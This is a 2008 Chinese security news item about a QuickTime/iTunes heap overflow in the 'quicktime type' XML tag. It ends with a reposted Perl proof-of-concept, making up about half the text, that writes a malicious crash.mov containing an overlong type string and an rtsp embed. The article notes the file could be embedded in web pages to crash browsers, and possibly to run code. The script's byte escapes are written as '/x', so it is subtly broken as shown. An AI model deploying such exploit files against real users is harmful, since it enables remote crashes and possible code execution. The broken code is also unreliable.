QuickTime 0day 安全代码发布,可能允许执行任意代码
来源:岁月联盟
时间:2008-09-22
该溢出程序利用了 QuickTime 处理
<? quicktime type= ?>参数时未能正确处理超长字符串的漏洞。
该程序目前只是使得 QuickTime 崩溃,但问题远比这严重。该程序暗示了漏洞有可能导致任意代码的执行,这可能导致严重的安全隐患,因为安全者可在网站上嵌入一个恶意文件来触发该漏洞。
但就连这个发布者自己也不大肯定。milw0rm.com 上写着“可能”允许执行任意代码。
赛门铁克目前正在研究这个漏洞,以便获得更多的技术细节。
临时解决方案:用户应当考虑暂时禁用 QuickTime 插件。该插件被安装在很多运行 Windows 系统的计算机里,并且在所有的 Mac 系统上都被默认安装。
cnBeta 编译
exp:
###############################################################################
# Quicktime7.5.5/Itunes 8.0 Remote Heap Overflow Crash
# Vendor: http://www.apple.com/
# Risk : high
#
# The "<? quicktime type= ?>" tag fail to handle long strings, which can lead to a heap overflow in Quicktime/Itunes media player.
# This bug can be remote or local, Quicktime/Itunes parse any supplied file for a reconized header even if the header is not corresponding
# to the filetype, so you can put some xml in a mp4, mov,etc and open it with quicktime or you can do the same in some html page leading to a
# remote crash on firefox, IE and any browser using the Quicktime plugin.
# Code execution may be possible.
my $payload =
"/x3c/x3f/x78/x6d/x6c/x20/x76/x65/x72/x73/x69/x6f/x6e/x3d/x22/x31/x2e/x30/x22/x3f".
"/x3e/x0d/x0a/x3c/x3f/x71/x75/x69/x63/x6b/x74/x69/x6d/x65/x20/x74/x79/x70/x65/x3d".
"/x22/x61/x70/x70/x6c/x69/x63/x61/x74/x69/x6f/x6e/x2f/x78/x2d/x71/x75/x69/x63/x6b".
"/x74/x69/x6d/x65/x2d/x6d/x65/x64/x69/x61/x2d/x6c/x69/x6e/x6b/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20".
"/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x20/x22/x3f/x3e".
"/x0d/x0a/x3c/x65/x6d/x62/x65/x64/x20/x73/x72/x63/x3d/x22/x72/x74/x73/x70/x3a/x2f".
"/x2f/x6e/x6f/x73/x69/x74/x65/x2e/x63/x6f/x6d/x2f/x6e/x6f/x76/x69/x64/x7a/x2e/x6d".
"/x6f/x76/x22/x20/x61/x75/x74/x6f/x70/x6c/x61/x79/x3d/x22/x77/x68/x61/x74/x65/x76".
"/x65/x72/x22/x20/x2f/x3e/x00";
my $file="crash.mov";
open(my $file, ">>$file") or die "Cannot open $file: $!";
print $file $payload;
close($file);
